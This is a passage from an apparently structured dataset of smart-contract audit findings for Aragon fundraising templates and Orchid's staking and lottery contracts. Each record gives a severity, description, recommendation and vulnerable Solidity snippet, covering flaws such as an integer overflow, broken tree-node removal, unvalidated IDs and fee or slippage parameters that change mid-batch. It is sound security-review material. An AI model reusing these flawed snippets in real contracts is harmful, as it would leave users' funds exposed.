script execution to cancel\\n\\*/\\nfunction cancelExecution(uint256 \\_delayedScriptId) external auth(CANCEL\\_EXECUTION\\_ROLE) {\\n delete delayedScripts[\\_delayedScriptId];\\n\\n emit ExecutionCancelled(\\_delayedScriptId);\\n}\\n```\\n -ID validation check missing for installDandelionAppsчlowч`DandelionOrg` allows users to kickstart an Aragon organization by using a dao template. There are two primary functions to instantiate an org: `newTokenAndBaseInstance`, and `installDandelionApps`. Both functions accept a parameter, `string _id`, meant to represent an ENS subdomain that will be assigned to the new org during the instantiation process. The two functions are called independently, but depend on each other.\\nIn `newTokenAndBaseInstance`, a sanity check is performed on the `_id` parameter, which ensures the `_id` length is nonzero:\\n```\\n\\_validateId(\\_id);\\n```\\n\\nNote that the value of `_id` is otherwise unused in `newTokenAndBaseInstance`.\\nIn `installDandelionApps`, this check is missing. The check is only important in this function, since it is in `installDandelionApps` that the ENS subdomain registration is actually performed.чUse `_validateId` in `installDandelionApps` rather than `newTokenAndBaseInstance`. Since the `_id` parameter is otherwise unused in `newTokenAndBaseInstance`, it can be removed.\\nAlternatively, the value of the submitted `_id` could be cached between calls and validated in `newTokenAndBaseInstance`, similarly to `newToken`.чч```\\n\\_validateId(\\_id);\\n```\\n -EOPBCTemplate - permission documentation inconsistenciesчhighчUndocumented\\nThe template documentation provides an overview of the permissions set with the template. 
The following permissions are set by the template contract but are not documented in the accompanied `fundraising/templates/externally_owned_presale_bonding_curve/README.md`.\\nTokenManager\\n```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n\\ncode/fundraising/templates/externally_owned_presale_bonding_curve/eopbc.yaml:L33-L44\\n```\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: market-maker\\n manager: owner\\n- app: anj-token-manager\\n role: MINT\\_ROLE\\n grantee: presale\\n manager: owner\\n- app: anj-token-manager\\n role: BURN\\_ROLE\\n grantee: market-maker\\n manager: owner\\n```\\n\\nInconsistent\\nThe following permissions are set by the template but are inconsistent to the outline in the documentation:\\nController\\n`owner` has the following permissions even though they are documented as not being set https://github.com/ConsenSys/aragonone-presale-audit-2019-11/blob/9ddae8c7fde9dea3af3982b965a441239d81f370/code/fundraising/templates/externally_owned_presale_bonding_curve/README.md#controller.\\n```\\n| App | Permission | Grantee | Manager |\\n| ---------- | ------------------------------------- | ------- | ------- |\\n| Controller | UPDATE_BENEFICIARY | NULL | NULL |\\n| Controller | UPDATE_FEES | NULL | NULL |\\n| Controller | ADD_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | REMOVE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_COLLATERAL_TOKEN | Owner | Owner |\\n| Controller | UPDATE_MAXIMUM_TAP_RATE_INCREASE_PCT | NULL | NULL |\\n| Controller | UPDATE_MAXIMUM_TAP_FLOOR_DECREASE_PCT | NULL | NULL |\\n| Controller | ADD_TOKEN_TAP | NULL | NULL |\\n| Controller | UPDATE_TOKEN_TAP | NULL | NULL |\\n| Controller | OPEN_PRESALE | Owner | Owner |\\n| Controller 
| OPEN_TRADING | Presale | Owner |\\n| Controller | CONTRIBUTE | Any | Owner |\\n| Controller | OPEN_BUY_ORDER | Any | Owner |\\n| Controller | OPEN_SELL_ORDER | Any | Owner |\\n| Controller | WITHDRAW | NULL | NULL |\\n```\\n\\n```\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_BENEFICIARY\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_owner, \\_fundraisingApps.controller, \\_fundraisingApps.controller.UPDATE\\_FEES\\_ROLE(), \\_owner);\\n```\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by adding the undocumented and deviating permissions to the documentation.\\nFor transparency, all permissions set-up by the template must be documented.чч```\\n\\_createPermissions(\\_acl, grantees, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.MINT\\_ROLE(), \\_owner);\\n\\_acl.createPermission(\\_fundraisingApps.marketMaker, \\_fundraisingApps.bondedTokenManager, \\_fundraisingApps.bondedTokenManager.BURN\\_ROLE(), \\_owner);\\n```\\n -EOPBCTemplate - AppId of BalanceRedirectPresale should be different from AragonBlack/Presale namehash to avoid collisionsчhighчThe template references the new presale contract with `apmNamehash` `0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5`. However, this namehash is already used by the aragonBlack/Presale contract. To avoid confusion and collision a unique `apmNamehash` should be used for this variant of the contract.\\nNote that the contract that is referenced from an `apmNamehash` is controlled by the `ENS` resolver that is configured when deploying the template contract. Using the same namehash for both variants of the contract does not allow a single registry to simultaneously provide both variants of the contract and might lead to confusion as to which application is actually deployed. 
This also raises the issue that the `ENS` registry must be verified before actually using the contract as a malicious registry could force the template to deploy potentially malicious applications.\\naragonOne/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\naragonBlack/Fundraising:\\n```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n\\n`bytes32 private constant PRESALE_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;`чCreate a new `apmNamehash` for `BalanceRedirectPresale`.чч```\\nbytes32 private constant PRESALE\\_ID = 0x5de9bbdeaf6584c220c7b7f1922383bcd8bbcd4b48832080afd9d5ebf9a04df5;\\n```\\n -BalanceRedirectPresale - Presale can be extended indefinitely Won't FixчhighчThe `OPEN_ROLE` can indefinitely extend the Presale even after users contributed funds to it by adjusting the presale period. The period might be further manipulated to avoid that token trading in the MarketMaker is opened.\\n```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n\\n```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\nчDo not allow to extend the presale after funds have been contributed to it or only allow period adjustments in `State.PENDING`.чч```\\nfunction setPeriod(uint64 \\_period) external auth(OPEN\\_ROLE) {\\n \\_setPeriod(\\_period);\\n}\\n```\\n -BalanceRedirectPresale - setPeriod uint64 overflow in validation checkчmediumч`setPeriod()` allows setting an arbitrary Presale starting date. The method can be called by an entity with the `OPEN_ROLE` permission. 
Providing a large enough value for `uint64 _period` can overflow the second input validation check. The result is unwanted behaviour where for relatively large values of `period` the require might fail because the overflow `openDate + _period` is less than or equal to the current timestamp (getTimestamp64()) but if high enough it still might succeed because `openDate + _period` is higher than the current timestamp. The overflow has no effect on the presale end as it is calculated against `_timeSinceOpen`.\\n```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by performing the addition using `SafeMath`.\\nUse `SafeMath` which is already imported to protect from overflow scenarios.чч```\\nfunction \\_setPeriod(uint64 \\_period) internal {\\n require(\\_period > 0, ERROR\\_TIME\\_PERIOD\\_ZERO);\\n require(openDate == 0 || openDate + \\_period > getTimestamp64(), ERROR\\_INVALID\\_TIME\\_PERIOD);\\n period = \\_period;\\n}\\n```\\n -EOPBCTemplate - misleading method names _cacheFundraisingApps and _cacheFundraisingParamsчlowчThe methods `_cacheFundraisingApps` and `_cacheFundraisingParams` suggest that parameters are cached as state variables in the contract similar to the multi-step deployment contract used for AragonBlack/Fundraising. 
However, the methods are just returning memory structs.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\nчThe functions are only called once throughout the deployment process. The structs can therefore be created directly in the main method. 
Otherwise rename the functions to properly reflect their purpose.чч```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n{\\n fundraisingParams = FundraisingParams({\\n owner: \\_owner,\\n id: \\_id,\\n collateralToken: \\_collateralToken,\\n bondedToken: \\_bondedToken,\\n period: \\_period,\\n exchangeRate: \\_exchangeRate,\\n openDate: \\_openDate,\\n reserveRatio: \\_reserveRatio,\\n batchBlocks: \\_batchBlocks,\\n slippage: \\_slippage\\n });\\n}\\n```\\n -EOPBCTemplate - inconsistent storage location declarationчlowч`_cacheFundraisingParams()` does not explicitly declare the return value memory location.\\n```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n\\n`_cacheFundraisingApps()` explicitly declares to return a copy of the storage struct.\\n```\\nfunction \\_cacheFundraisingApps(\\n Agent \\_reserve,\\n Presale \\_presale,\\n 
MarketMaker \\_marketMaker,\\n Tap \\_tap,\\n Controller \\_controller,\\n TokenManager \\_tokenManager\\n)\\n internal\\n returns (FundraisingApps memory fundraisingApps)\\n{\\n fundraisingApps.reserve = \\_reserve;\\n fundraisingApps.presale = \\_presale;\\n fundraisingApps.marketMaker = \\_marketMaker;\\n fundraisingApps.tap = \\_tap;\\n fundraisingApps.controller = \\_controller;\\n fundraisingApps.bondedTokenManager = \\_tokenManager;\\n}\\n```\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by adding the missing storage location declaration.\\nStorage declarations should be consistent.чч```\\nfunction \\_cacheFundraisingParams(\\n address \\_owner,\\n string \\_id,\\n ERC20 \\_collateralToken,\\n MiniMeToken \\_bondedToken,\\n uint64 \\_period,\\n uint256 \\_exchangeRate,\\n uint64 \\_openDate,\\n uint256 \\_reserveRatio,\\n uint256 \\_batchBlocks,\\n uint256 \\_slippage\\n)\\n internal\\n returns (FundraisingParams fundraisingParams)\\n```\\n -EOPBCTemplate - EtherTokenConstant is never usedчlowчThe constant value `EtherTokenConstant.ETH` is never used.\\n```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\nчResolution\\nFixed with aragonone/[email protected]bafe100 by removing the `EtherTokenConstant` dependency.\\nRemove all references to `EtherTokenConstant`.чч```\\ncontract EOPBCTemplate is EtherTokenConstant, BaseTemplate {\\n```\\n -Staking node can be inappropriately removed from the treeчhighчThe following code in `OrchidDirectory.pull()` is responsible for reattaching a child from a removed tree node:\\n```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n\\nThe condition name(stake.left_) == `key` can never hold because `key` is the `key` for `stake` itself.\\nThe result of this bug is somewhat catastrophic. 
The child is not reattached, but it still has a link to the rest of the tree via its `parent_` pointer. This means reducing the stake of that node can underflow the ancestors' before/after amounts, leading to improper random selection or failing altogether.\\nThe node replacing the removed node also ends up with itself as a child, which violates the basic tree structure and is again likely to produce integer underflows and other failures.чAs a simple fix, use `if(name(stake.left_) == name(last))` as already suggested by the development team when this bug was first shared.\\nTwo suggestions for better long-term fixes:\\nUse a strict interface for tree operations. It should be impossible to update a node's parent without simultaneously updating that parent's child pointer.\\nAs suggested in (https://github.com/ConsenSys/orchid-audit-2019-10/issues/7), simplify the logic in `pull()` to avoid this logic altogether.чч```\\nif (name(stake.left\\_) == key) {\\n current.right\\_ = stake.right\\_;\\n current.after\\_ = stake.after\\_;\\n} else {\\n current.left\\_ = stake.left\\_;\\n current.before\\_ = stake.before\\_;\\n}\\n```\\n -Verifiers need to be pure, but it's very difficult to validate purenessчmediumчAfter the initial audit, a “verifier” was introduced to the `OrchidLottery` code. Each `Pot` can have an associated `OrchidVerifier`. This is a contract with a `good()` function that accepts three parameters:\\n```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n\\nThe verifier returns a boolean indicating whether a given micropayment should be allowed or not. An example use case is a verifier that only allows certain `target` addresses to be paid. 
In this case, `shared` (a single value for a given Pot) is a merkle root, `target` is (as always) the address being paid, and `receipt` (specified by the payment recipient) is a merkle proof that the `target` address is within the merkle tree with the given root.\\nA server providing bandwidth needs to know whether to accept a certain receipt. To do that, it needs to know that at some time in the future, a call to the verifier's `good()` function with a particular set of parameters will return `true`. The proposed scheme for determining that is for the server to run the contract's code locally and ensure that it returns `true` and that it doesn't execute any EVM opcodes that would read state. This prevents, for example, a contract from returning `true` until a certain timestamp and then start returning `false`. If a contract could do that, the server would be tricked into providing bandwidth without then receiving payment.\\nUnfortunately, this simple scheme is insufficient. As a simple example, a verifier contract could be created with the `CREATE2` opcode. It could be demonstrated that it reads no state when `good()` is called. Then the contract could be destroyed by calling a function that performs a `SELFDESTRUCT`, and it could be replaced via another `CREATE2` call with different code.\\nThis could be mitigated by rejecting any verifier contract that contains the `SELFDESTRUCT` opcode, but this would also catch harmless occurrences of that particular byte. https://gist.github.com/Arachnid/e8f0638dc9f5687ff8170a95c47eac1e attempts to find `SELFDESTRUCT` opcodes but fails to account for tricks where the `SELFDESTRUCT` appears to be data but can actually be executed. (See Recmo's comment.) In general, this approach is difficult to get right and probably requires full data flow analysis to be correct.\\nAnother possible mitigation is to use a factory contract to deploy the verifiers, guaranteeing that they're not created with `CREATE2`. 
This should render `SELFDESTRUCT` harmless, but there's no guarantee that future forks won't introduce new vectors here.\\nFinally, requiring servers to implement potentially complex contract validation opens up potential for denial-of-service attacks. A server will have to implement mitigations to prevent repeatedly checking the same verifier or spending inordinate resources checking a maliciously crafted contract (e.g. one with high branching factors).чThe verifiers add quite a bit of complexity and risk. We recommend looking for an alternative approach, such as including a small number of vetted verifiers (e.g. a merkle proof verifier) or having servers use their own “allow list” for verifiers that they trust.чч```\\nfunction good(bytes calldata shared, address target, bytes calldata receipt) external pure returns (bool);\\n```\\n -Use consistent staker, stakee ordering in OrchidDirectoryчlowч```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n\\n`OrchidDirectory.lift()` has a parameter `stakee` that precedes `staker`, while the rest of the code always places `staker` first. Because Solidity doesn't have named parameters, it's a good idea to use a consistent ordering to avoid mistakes.чResolution\\nThis is fixed in OrchidProtocol/[email protected]1cfef88.\\nSwitch `lift()` to follow the “staker then stakee” ordering convention of the rest of the contract.чч```\\nfunction lift(bytes32 key, Stake storage stake, uint128 amount, address stakee, address staker) private {\\n```\\n -In OrchidDirectory.step() and OrchidDirectory.lift(), use a signed amount Won't Fixчlowч`step()` and `lift()` both accept a `uint128` parameter called `amount`. This `amount` is added to various struct fields, which are also of type `uint128`.\\nThe contract intentionally underflows this `amount` to represent negative numbers. 
This is roughly equivalent to using a signed integer, except that:\\nUnsigned integers aren't sign extended when they're cast to a larger integer type, so care must be taken to avoid this.\\nTools that look for integer overflow/underflow will detect this possibility as a bug. It's then hard to determine which overflows are intentional and which are not.\\n```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n\\n```\\nstep(key, stake, -current.amount\\_, current.parent\\_);\\n```\\nчResolution\\nThe variables in question are now uint256s. The amount of type casts that would be needed in case the recommended change was implemented would defeat the purpose of simplification.\\nUse `int128` instead, and ensure that amounts can never exceed the maximum `int128` value. (This is trivially achieved by limiting the total number of tokens that can exist.)чч```\\nlift(key, stake, -amount, stakee, staker);\\n```\\n -Document that math in OrchidDirectory assumes a maximum number of tokensчlowч`OrchidDirectory` relies on mathematical operations being unable to overflow due to the particular ERC20 token being used being capped at less than `2**128`.\\nThe following code in `step()` assumes that no before/after amount can reach 2**128:\\n```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n\\nThe following code in `lift()` assumes that no staked amount (or total amount for a given stakee) can reach 2**128:\\n```\\nuint128 local = stake.amount\\_;\\nlocal += amount;\\nstake.amount\\_ = local;\\nemit Update(staker, stakee, local);\\n\\nuint128 global = stakees\\_[stakee].amount\\_;\\nglobal += amount;\\nstakees\\_[stakee].amount\\_ = global;\\n```\\n\\nThe following code in `have()` assumes that the total amount staked cannot reach 2**128:\\n```\\nreturn stake.before\\_ + stake.after\\_ + stake.amount\\_;\\n```\\nчDocument this assumption in the form of code comments where potential overflows exist.\\nConsider also 
asserting the ERC20 token's total supply in the constructor to attempt to block using a token that violates this constraint and/or checking in `push()` that the total amount staked will remain less than `2**128`. This recommendation is in line with the mitigation proposed for issue 6.7.чч```\\nif (name(stake.left\\_) == key)\\n stake.before\\_ += amount;\\nelse\\n stake.after\\_ += amount;\\n```\\n -Fees can be changed during the batchчhighчShareholders can vote to change the fees. For buy orders, fees are withdrawn immediately when order is submitted and the only risk is frontrunning by the shareholder's voting contract.\\nFor sell orders, fees are withdrawn when a trader claims an order and withdraws funds in `_claimSellOrder` function:\\n```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n\\nFees can be changed between opening order and claiming this order which makes the fees unpredictable.чResolution\\nFixed with AragonBlack/[email protected]0941f53 by storing current fee in meta batch.\\nFees for an order should not be updated during its lifetime.чч```\\nif (fee > 0) {\\n reserve.transfer(\\_collateral, beneficiary, fee);\\n}\\n```\\n -Bancor formula should not be updated during the batchчhighчShareholders can vote to change the bancor formula contract. 
That can make a price in the current batch unpredictable.\\n```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\nчBancor formula update should be executed in the next batch or with a timelock that is greater than batch duration.чч```\\nfunction updateFormula(IBancorFormula \\_formula) external auth(UPDATE\\_FORMULA\\_ROLE) {\\n require(isContract(\\_formula), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateFormula(\\_formula);\\n}\\n```\\n -Maximum slippage shouldn't be updated for the current batchчhighчWhen anyone submits a new order, the batch price is updated and it's checked whether the price slippage is acceptable. The problem is that the maximum slippage can be updated during the batch and traders cannot be sure that price is limited as they initially expected.\\n```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n\\nAdditionally, if a maximum slippage is updated to a lower value, some of the orders that should lower the current slippage will also revert.чSave a slippage value on batch initialization and use it during the current batch.чч```\\nfunction \\_slippageIsValid(Batch storage \\_batch, address \\_collateral) internal view returns (bool) {\\n uint256 staticPricePPM = \\_staticPricePPM(\\_batch.supply, \\_batch.balance, \\_batch.reserveRatio);\\n uint256 maximumSlippage = collaterals[\\_collateral].slippage;\\n```\\n -AragonFundraisingController - an untapped address in toReset can block attempts of opening Trading after presaleчhighчAragonFundraisingController can be initialized with a list of token addresses `_toReset` that are to be reset when trading opens after 
the presale. These addresses are supposed to be addresses of tapped tokens. However, the list needs to be known when initializing the contract but the tapped tokens are added after initialization when calling `addCollateralToken` (and tapped with _rate>0). This can lead to an inconsistency that blocks `openTrading`.\\n```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n\\nIn case a token address makes it into the list of `toReset` tokens that is not tapped it will be impossible to `openTrading` as `tap.resetTappedToken(toReset[i]);` throws for untapped tokens. According to the permission setup in `FundraisingMultisigTemplate` only Controller can call `Marketmaker.open`\\n```\\nfunction openTrading() external auth(OPEN\\_TRADING\\_ROLE) {\\n for (uint256 i = 0; i < toReset.length; i++) {\\n tap.resetTappedToken(toReset[i]);\\n }\\n\\n marketMaker.open();\\n}\\n```\\nчInstead of initializing the Controller with a list of tapped tokens to be reset when trading opens, add a flag to `addCollateralToken` to indicate that the token should be reset when calling `openTrading`, making sure only tapped tokens are added to this list. 
This also allows adding tapped tokens that are to be reset at a later point in time.чч```\\nfor (uint256 i = 0; i < \\_toReset.length; i++) {\\n require(\\_tokenIsContractOrETH(\\_toReset[i]), ERROR\\_INVALID\\_TOKENS);\\n toReset.push(\\_toReset[i]);\\n}\\n```\\n -[New] Tapped collaterals can be bought by traders Won't FixчmediumчWhen a trader submits a sell order, `_openSellOrder()` function checks that there are enough tokens in `reserve` by calling `_poolBalanceIsSufficient` function\\n```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n\\nthe problem is that because `collateralsToBeClaimed[_collateral]` has increased, `controller.balanceOf(address(reserve), _collateral)` could also increase. It happens so because `controller.balanceOf()` function subtracts tapped amount from the reserve's balance.\\n```\\nfunction balanceOf(address \\_who, address \\_token) public view isInitialized returns (uint256) {\\n uint256 balance = \\_token == ETH ? \\_who.balance : ERC20(\\_token).staticBalanceOf(\\_who);\\n\\n if (\\_who == address(reserve)) {\\n return balance.sub(tap.getMaximumWithdrawal(\\_token));\\n } else {\\n return balance;\\n }\\n}\\n```\\n\\nAnd `tap.getMaximumWithdrawal(_token)` could decrease because it depends on `collateralsToBeClaimed[_collateral]`\\n```\\nfunction \\_tappedAmount(address \\_token) internal view returns (uint256) {\\n uint256 toBeKept = controller.collateralsToBeClaimed(\\_token).add(floors[\\_token]);\\n uint256 balance = \\_token == ETH ? 
address(reserve).balance : ERC20(\\_token).staticBalanceOf(reserve);\\n uint256 flow = (\\_currentBatchId().sub(lastTappedAmountUpdates[\\_token])).mul(rates[\\_token]);\\n uint256 tappedAmount = tappedAmounts[\\_token].add(flow);\\n /\\*\\*\\n \\* whatever happens enough collateral should be\\n \\* kept in the reserve pool to guarantee that\\n \\* its balance is kept above the floor once\\n \\* all pending sell orders are claimed\\n \\*/\\n\\n /\\*\\*\\n \\* the reserve's balance is already below the balance to be kept\\n \\* the tapped amount should be reset to zero\\n \\*/\\n if (balance <= toBeKept) {\\n return 0;\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming tap flow would be below the balance to be kept\\n \\* the flow should be reduced to balance - toBeKept\\n \\*/\\n if (balance <= toBeKept.add(tappedAmount)) {\\n return balance.sub(toBeKept);\\n }\\n\\n /\\*\\*\\n \\* the reserve's balance minus the upcoming flow is above the balance to be kept\\n \\* the flow can be added to the tapped amount\\n \\*/\\n return tappedAmount;\\n}\\n```\\n\\nThat means that the amount that beneficiary can withdraw has just decreased, which should not be possible.чEnsure that `tappedAmount` cannot be decreased once updated.чч```\\nfunction \\_poolBalanceIsSufficient(address \\_collateral) internal view returns (bool) {\\n return controller.balanceOf(address(reserve), \\_collateral) >= collateralsToBeClaimed[\\_collateral];\\n}\\n```\\n -Presale - contributionToken double cast and invalid comparisonчmediumчThe Presale can be configured to accept `ETH` or a valid `ERC20` `token`. This `token` is stored as an `ERC20` contract type in the state variable `contributionToken`. It is then directly compared to constant `ETH` which is `address(0x0)` in various locations. 
Additionally, the `_transfer` function double casts the `token` to `ERC20` if the `contributionToken` is passed as an argument.\\n`contribute` - invalid comparison of contract type against `address(0x00)`. Even though this is accepted in solidity `<0.5.0` it is going to raise a compiler error with newer versions (>=0.5.0).\\n```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n\\n`_transfer` - double cast `token` to `ERC20` if it is the contribution `token`.\\n```\\nrequire(ERC20(\\_token).safeTransfer(\\_to, \\_amount), ERROR\\_TOKEN\\_TRANSFER\\_REVERTED);\\n```\\nч`contributionToken` can either be `ETH` or a valid `ERC20` contract address. It is therefore recommended to store the token as an address type instead of the more precise contract type to resolve the double cast and the invalid contract type to address comparison or cast the `ERC20` type to `address()` before comparison.чч```\\nfunction contribute(address \\_contributor, uint256 \\_value) external payable nonReentrant auth(CONTRIBUTE\\_ROLE) {\\n require(state() == State.Funding, ERROR\\_INVALID\\_STATE);\\n\\n if (contributionToken == ETH) {\\n require(msg.value == \\_value, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n } else {\\n require(msg.value == 0, ERROR\\_INVALID\\_CONTRIBUTE\\_VALUE);\\n }\\n```\\n -Fees are not returned for buy orders if a batch is canceled Won't FixчmediumчEvery trader pays fees on each buy order and transfers it directly to the `beneficiary`.\\n```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, 
fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n\\nIf the batch is canceled, fees are not returned to the traders because there is no access to the beneficiary account.\\nAdditionally, fees are returned to traders for all the sell orders if the batch is canceled.чConsider transferring fees to a beneficiary only after the batch is over.чч```\\nuint256 fee = \\_value.mul(buyFeePct).div(PCT\\_BASE);\\nuint256 value = \\_value.sub(fee);\\n\\n// collect fee and collateral\\nif (fee > 0) {\\n \\_transfer(\\_buyer, beneficiary, \\_collateral, fee);\\n}\\n\\_transfer(\\_buyer, address(reserve), \\_collateral, value);\\n```\\n -Tap - Controller should not be updateableчmediumчSimilar to the issue 6.11, `Tap` allows updating the `Controller` contract it is using. The permission is currently not assigned in the `FundraisingMultisigTemplate` but might be used in custom deployments.\\n```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\nчTo avoid inconsistencies, we suggest to remove this functionality and provide a guideline on how to safely upgrade components of the system.чч```\\n/\\*\\*\\n \\* @notice Update controller to `\\_controller`\\n \\* @param \\_controller The address of the new controller contract\\n\\*/\\nfunction updateController(IAragonFundraisingController \\_controller) external auth(UPDATE\\_CONTROLLER\\_ROLE) {\\n require(isContract(\\_controller), ERROR\\_CONTRACT\\_IS\\_EOA);\\n\\n \\_updateController(\\_controller);\\n}\\n```\\n -Tap - reserve can be updated in Tap but not in MarketMaker or ControllerчmediumчThe address of the pool/reserve contract can be updated in `Tap` if someone owns the 
